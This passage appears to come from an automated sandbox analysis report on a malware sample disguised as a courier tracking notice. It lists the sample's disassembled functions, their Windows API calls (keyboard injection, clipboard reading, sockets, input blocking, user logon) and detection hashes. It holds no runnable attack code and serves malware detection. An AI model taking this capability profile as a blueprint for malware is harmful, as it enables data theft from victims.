                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __wcsicollmouse_event
                                      • String ID: DOWN
                                      • API String ID: 1033544147-711622031
                                      • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                      • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                      • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                      • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                      Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 0044C3D2
                                      • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                      • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                      • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                      • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: KeyboardMessagePostState$InputSend
                                      • String ID:
                                      • API String ID: 3031425849-0
                                      • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                      • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                      • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                      • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                      Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                      • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ErrorLastinet_addrsocket
                                      • String ID:
                                      • API String ID: 4170576061-0
                                      • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                      • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                      • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                      • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                      Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                      • IsWindowVisible.USER32 ref: 0047A368
                                      • IsWindowEnabled.USER32 ref: 0047A378
                                      • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                      • IsIconic.USER32 ref: 0047A393
                                      • IsZoomed.USER32 ref: 0047A3A1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                      • String ID:
                                      • API String ID: 292994002-0
                                      • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                      • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                      • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                      • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                      Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenClipboard.USER32(?), ref: 0046DCE7
                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                      • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                      • CloseClipboard.USER32 ref: 0046DD0D
                                      • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                      • CloseClipboard.USER32 ref: 0046DD41
                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                      • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                      • CloseClipboard.USER32 ref: 0046DD99
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                      • String ID:
                                      • API String ID: 15083398-0
                                      • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                      • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                      • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                      • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                      Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: U$\
                                      • API String ID: 4104443479-100911408
                                      • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                      • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                      • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                      • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                      Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Find$File$CloseFirstNext
                                      • String ID:
                                      • API String ID: 3541575487-0
                                      • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                      • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                      • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                      • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                      Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                      • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                      • FindClose.KERNEL32(00000000), ref: 004339EB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: FileFind$AttributesCloseFirst
                                      • String ID:
                                      • API String ID: 48322524-0
                                      • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                      • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                      • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                      • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                      Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                      • String ID:
                                      • API String ID: 901099227-0
                                      • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                      • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                      • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                      • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                      Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                                      Download Yara Rule
                                      APIs
                                      • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Proc
                                      • String ID:
                                      • API String ID: 2346855178-0
                                      • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                      • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                      • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                      • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                      Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • BlockInput.USER32(00000001), ref: 0045A38B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: BlockInput
                                      • String ID:
                                      • API String ID: 3456056419-0
                                      • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                      • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                      • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                      • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                      Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                      • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: LogonUser
                                      • String ID:
                                      • API String ID: 1244722697-0
                                      • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                      • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                      • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                      • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                      Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: NameUser
                                      • String ID:
                                      • API String ID: 2645101109-0
                                      • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                      • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                      • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                      • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                      Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                      • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                      • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                      • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                      Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: N@
                                      • API String ID: 0-1509896676
                                      • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                      • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                      • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                      • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                      Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                      • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                      • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                      • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                      Function 004129D0 Relevance: .4, Instructions: 355COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
